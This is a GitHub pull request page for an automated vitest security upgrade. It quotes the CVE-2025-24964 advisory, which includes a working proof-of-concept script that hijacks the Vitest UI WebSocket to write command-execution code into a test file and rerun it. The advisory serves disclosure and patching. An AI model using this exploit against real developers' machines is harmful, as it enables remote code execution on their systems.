chore(deps): update dependency vitest to v2.1.9 [security] #148

renovate · 2025-02-04T17:43:32Z

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
vitest (source)	`2.1.8` -> `2.1.9`

GitHub Vulnerability Alerts

CVE-2025-24964

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

Open Vitest UI.
Access a malicious web site with the script below.
If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.

// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Release Notes

vitest-dev/vitest (vitest)

Configuration

📅 Schedule: Branch creation - "" in timezone Asia/Shanghai, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

vercel · 2025-02-04T17:43:37Z

The latest updates on your projects. Learn more about Vercel for Git ↗︎

Name	Status	Preview	Comments	Updated (UTC)
techtrek	✅ Ready (Inspect)	Visit Preview	💬 Add feedback	Mar 13, 2025 6:54pm

* 🐛 fix: header dark mode Signed-off-by: Zach <[email protected]> * chore(deps): update dependency nbump to ^2.0.7 (#95) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * 🐛 fix: home dark mode Signed-off-by: Zach <[email protected]> * chore(release): release v0.0.1-alpha.4 * chore(deps): update dependency @vitejs/plugin-react to ^4.3.2 (#97) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update pnpm to v9.12.0 (#90) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#98) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore: update deps * chore(deps): update all non-major dependencies (patch) (#99) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * 🔧 chore: eslint Signed-off-by: Zach <[email protected]> * chore(deps): update dependency eslint to ^9.12.0 (#100) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#101) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (minor) (#102) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#104) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#105) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#106) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (minor) (#107) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency @iconify-json/material-symbols to ^1.2.6 (#108) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#109) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency happy-dom to v15.10.2 [security] (#113) chore(deps): update dependency happy-dom to v15.10.1 [security] Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps-dev): bump happy-dom from 15.8.3 to 15.10.2 (#114) Bumps [happy-dom](https://github.com/capricorn86/happy-dom) from 15.8.3 to 15.10.2. - [Release notes](https://github.com/capricorn86/happy-dom/releases) - [Commits](capricorn86/happy-dom@v15.8.3...v15.10.2) --- updated-dependencies: - dependency-name: happy-dom dependency-type: direct:development ... Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#110) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency happy-dom to ^15.11.0 (#116) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency postcss to ^8.4.48 (#117) * chore(deps): update all non-major dependencies (patch) (#118) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update pnpm to v9.13.0 (#120) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * 🔧 chore: upgrade to motion * 🐛 fix: type Signed-off-by: Zach <[email protected]> * ✨ feat: use prettier format Signed-off-by: Zach <[email protected]> * chore(deps): update all non-major dependencies (patch) (#119) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update pnpm to v9.13.1 (#121) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): bump @eslint/plugin-kit from 0.2.2 to 0.2.3 (#123) Bumps [@eslint/plugin-kit](https://github.com/eslint/rewrite) from 0.2.2 to 0.2.3. - [Release notes](https://github.com/eslint/rewrite/releases) - [Changelog](https://github.com/eslint/rewrite/blob/main/release-please-config.json) - [Commits](eslint/rewrite@plugin-kit-v0.2.2...plugin-kit-v0.2.3) --- updated-dependencies: - dependency-name: "@eslint/plugin-kit" dependency-type: indirect ... Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#122) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (minor) (#124) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency @iconify-json/material-symbols to ^1.2.8 (#126) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (minor) (#125) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency @types/node to ^20.17.7 (#127) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (minor) (#129) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#128) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): lock file maintenance (#130) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * fix(deps): update all non-major dependencies (minor) (#132) fix(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * fix(deps): update all non-major dependencies (patch) (#131) fix(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update actions/attest-build-provenance action to v2 (#133) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#137) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * fix(deps): update all non-major dependencies (patch) (#139) fix(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * fix(deps): update react monorepo to v19 (major) (#136) fix(deps): update react monorepo to v19 Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency @types/react to v19 (#134) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * fix(deps): update all non-major dependencies (minor) (#138) fix(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore: X * chore(deps): update dependency vitest to v2.1.9 [security] (#148) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(release): release v0.0.1 * Revert "chore(release): release v0.0.1" This reverts commit efaf821. * chore(release): release v0.0.1-alpha.5 --------- Signed-off-by: Zach <[email protected]> Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

* 🐛 fix: header dark mode Signed-off-by: Zach <[email protected]> * chore(deps): update dependency nbump to ^2.0.7 (#95) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * 🐛 fix: home dark mode Signed-off-by: Zach <[email protected]> * chore(release): release v0.0.1-alpha.4 * chore(deps): update dependency @vitejs/plugin-react to ^4.3.2 (#97) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update pnpm to v9.12.0 (#90) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#98) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore: update deps * chore(deps): update all non-major dependencies (patch) (#99) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * 🔧 chore: eslint Signed-off-by: Zach <[email protected]> * chore(deps): update dependency eslint to ^9.12.0 (#100) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#101) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (minor) (#102) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#104) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#105) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#106) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (minor) (#107) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency @iconify-json/material-symbols to ^1.2.6 (#108) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#109) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency happy-dom to v15.10.2 [security] (#113) chore(deps): update dependency happy-dom to v15.10.1 [security] Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps-dev): bump happy-dom from 15.8.3 to 15.10.2 (#114) Bumps [happy-dom](https://github.com/capricorn86/happy-dom) from 15.8.3 to 15.10.2. - [Release notes](https://github.com/capricorn86/happy-dom/releases) - [Commits](capricorn86/happy-dom@v15.8.3...v15.10.2) --- updated-dependencies: - dependency-name: happy-dom dependency-type: direct:development ... Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#110) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency happy-dom to ^15.11.0 (#116) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency postcss to ^8.4.48 (#117) * chore(deps): update all non-major dependencies (patch) (#118) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update pnpm to v9.13.0 (#120) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * 🔧 chore: upgrade to motion * 🐛 fix: type Signed-off-by: Zach <[email protected]> * ✨ feat: use prettier format Signed-off-by: Zach <[email protected]> * chore(deps): update all non-major dependencies (patch) (#119) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update pnpm to v9.13.1 (#121) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): bump @eslint/plugin-kit from 0.2.2 to 0.2.3 (#123) Bumps [@eslint/plugin-kit](https://github.com/eslint/rewrite) from 0.2.2 to 0.2.3. - [Release notes](https://github.com/eslint/rewrite/releases) - [Changelog](https://github.com/eslint/rewrite/blob/main/release-please-config.json) - [Commits](eslint/rewrite@plugin-kit-v0.2.2...plugin-kit-v0.2.3) --- updated-dependencies: - dependency-name: "@eslint/plugin-kit" dependency-type: indirect ... Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#122) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (minor) (#124) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency @iconify-json/material-symbols to ^1.2.8 (#126) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (minor) (#125) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency @types/node to ^20.17.7 (#127) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (minor) (#129) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#128) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): lock file maintenance (#130) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * fix(deps): update all non-major dependencies (minor) (#132) fix(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * fix(deps): update all non-major dependencies (patch) (#131) fix(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update actions/attest-build-provenance action to v2 (#133) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update all non-major dependencies (patch) (#137) chore(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * fix(deps): update all non-major dependencies (patch) (#139) fix(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * fix(deps): update react monorepo to v19 (major) (#136) fix(deps): update react monorepo to v19 Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(deps): update dependency @types/react to v19 (#134) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * fix(deps): update all non-major dependencies (minor) (#138) fix(deps): update all non-major dependencies Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore: X * chore(deps): update dependency vitest to v2.1.9 [security] (#148) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * chore(release): release v0.0.1 * Revert "chore(release): release v0.0.1" This reverts commit efaf821. * chore(release): release v0.0.1-alpha.5 * chore(deps): bump next from 14.2.21 to 14.2.25 (#152) Bumps [next](https://github.com/vercel/next.js) from 14.2.21 to 14.2.25. - [Release notes](https://github.com/vercel/next.js/releases) - [Changelog](https://github.com/vercel/next.js/blob/canary/release.js) - [Commits](vercel/next.js@v14.2.21...v14.2.25) --- updated-dependencies: - dependency-name: next dependency-type: direct:production ... Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * chore: change license from MIT to GPL-3.0 and add changelog system * ✨ feat: new UX Signed-off-by: Zach <[email protected]> * chore: update deps * chore: mistake filename * release: release v0.0.1 --------- Signed-off-by: Zach <[email protected]> Signed-off-by: dependabot[bot] <[email protected]> Signed-off-by: Zach <[email protected]> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

renovate bot added the renovate label Feb 4, 2025

vercel bot deployed to Preview February 4, 2025 17:44 View deployment

renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 5b6b2d1 to 217e8f3 Compare February 9, 2025 13:45

vercel bot deployed to Preview February 9, 2025 13:46 View deployment

renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 217e8f3 to c07ce09 Compare March 3, 2025 17:38

vercel bot deployed to Preview March 3, 2025 17:39 View deployment

renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from c07ce09 to abf642b Compare March 9, 2025 05:21

vercel bot deployed to Preview March 9, 2025 05:22 View deployment

chore(deps): update dependency vitest to v2.1.9 [security]

742a248

renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from abf642b to 742a248 Compare March 13, 2025 18:53

vercel bot deployed to Preview March 13, 2025 18:54 View deployment

Zach677 approved these changes Mar 15, 2025

View reviewed changes

Zach677 merged commit ff2e472 into dev Mar 15, 2025
4 checks passed

renovate bot deleted the renovate/npm-vitest-vulnerability branch March 15, 2025 02:43

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

chore(deps): update dependency vitest to v2.1.9 [security] #148

chore(deps): update dependency vitest to v2.1.9 [security] #148

renovate bot commented Feb 4, 2025

vercel bot commented Feb 4, 2025 •

edited

Loading

chore(deps): update dependency vitest to v2.1.9 [security] #148

chore(deps): update dependency vitest to v2.1.9 [security] #148

Conversation

renovate bot commented Feb 4, 2025

GitHub Vulnerability Alerts

CVE-2025-24964

Summary

Details

PoC

Impact

Release Notes

v2.1.9

🚨 Breaking Changes

🚀 Features

🐞 Bug Fixes

Configuration

vercel bot commented Feb 4, 2025 • edited Loading

`v2.1.9`

vercel bot commented Feb 4, 2025 •

edited

Loading